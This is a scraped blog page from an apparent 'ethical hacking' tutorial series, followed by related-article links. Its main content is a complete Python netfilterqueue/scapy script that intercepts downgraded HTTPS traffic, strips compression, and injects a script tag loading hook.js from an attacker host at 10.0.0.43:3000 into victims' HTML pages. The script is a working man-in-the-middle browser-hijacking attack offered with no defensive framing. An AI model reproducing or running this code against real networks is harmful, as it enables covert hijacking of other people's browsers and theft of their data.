Injecting Code in HTTPS Pages:

#!/usr/bin/env python

import re

from netfilterqueue import NetfilterQueue

from scapy.layers.inet import TCP, IP

from scapy.packet import Raw

def set_load(packet, load):

    packet[Raw].load = load

    del packet[IP].len

    del packet[IP].chksum

    del packet[TCP].chksum

    return packet

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):

        load = scapy_packet[Raw].load

        if scapy_packet[TCP].dport == 10000:

            print("[+] Request")

            print(scapy_packet.show())

            load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)

            load = load.replace("HTTP/1.1", "HTTP/1.0")

        elif scapy_packet[TCP].sport == 10000:

            print("[+] Response")

            injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'

            load = load.replace(b"</body>", injection_code + b"</body>")

            content_length_search = re.search(b"(?:Content-Length:\s)(\d*)", load)

            if content_length_search and b"text/html" in load:

                print(content_length_search)

                content_length = content_length_search.group(1)

                new_content_length = int(content_length) + len(injection_code)

                load = load.replace(content_length, str(new_content_length).encode())

        if load != scapy_packet[Raw].load:

            print("Payload")

            new_packet = set_load(scapy_packet, load)

            print(str(new_packet))

            packet.set_payload(str(new_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Python Ethical Hacking - Bypass HTTPS(2)的更多相关文章

  1. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  2. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  5. Python Ethical Hacking - The Lab and Needed Software

    The Lab and Needed Software Attacker Machine - Kali Linux https://www.kali.org/ 1. Install the softw ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

  9. Python Ethical Hacking - Intercepting and Modifying Packets

    INTERCEPTING & MODIFYING PACKETS Scapy can be used to: Create packets. Analyze packets. Send/rec ...

随机推荐

  1. Ngnix 配置文件快速入门

    转自https://www.cnblogs.com/knowledgesea/p/5175711.html 其实也没什么好说的,我想大部分人也不会在意nginx的实现原理啥的.服务器要部署的时候,把n ...

  2. 3.kubernetes的CNI网络插件-Flannel

    目录 1.1.K8S的CNI网络插件-Flannel 1.1.1.集群规划 1.1.2.下载软件.解压.软链接 1.1.3.最终目录结构 1.1.4.拷贝证书 1.1.5.创建配置 1.1.6.创建启 ...

  3. 乌班图设置C++11

    zsh: echo "alias g++='g++ -std=c++11'" >> ~/.zshrc  source ~/.zshrc bash: echo " ...

  4. SpringCloud Alibaba (三):Sentinel 流量控制组件

    SpringCloud Alibaba (三):Sentinel 流量控制组件 Sentinel 是什么 随着微服务的流行,服务和服务之间的稳定性变得越来越重要.Sentinel 是面向分布式服务架构 ...

  5. elasticsearch 之 深入探秘type底层数据结构

    1.理论知识 type,是一个index中用来区分类似的数据的,类似的数据,但是可能有不同的fields,而且有不同的属性来控制索引建立.分词器.field的value,在底层的lucene中建立索引 ...

  6. 服务扫描-dmitry、nmap、amap和服务识别

    dmitry使用-pb参数可以进行常用端口的banner抓取. 抓取效果: 强大的nmap也可以进行banner抓取,但是需要使用nmap内置的banner.nse脚本: kali中还有一个工具叫am ...

  7. 【Spring】内嵌Tomcat&去Xml&调试Mvc

    菜瓜:今天听到个名词“父子容器”,百度了一下,感觉概念有点空洞,这是什么核武器? 水稻:你说的是SpringMvc和Spring吧,其实只是一个概念而已,用来将两个容器做隔离,起到解耦的作用,其中子容 ...

  8. 放弃for循环吧

    前言 for(var i=0;i<array.length;i++){}这个可以是初学者必学的知识,也是JS中必不可少的功能,但如果对性能要求较高的小伙伴有了解过就会发现,for循环性能不高且代 ...

  9. Redis 6.0 访问控制列表ACL说明

    背景 在Redis6.0之前的版本中,登陆Redis Server只需要输入密码(前提配置了密码 requirepass )即可,不需要输入用户名,而且密码也是明文配置到配置文件中,安全性不高.并且应 ...

  10. LeetCode 第 196 场周赛 (题目:5452-5455,这是参加过最坑的周赛,暴力n^2居然可以过)

    5452. 判断能否形成等差数列   给你一个数字数组 arr . 如果一个数列中,任意相邻两项的差总等于同一个常数,那么这个数列就称为 等差数列 . 如果可以重新排列数组形成等差数列,请返回 tru ...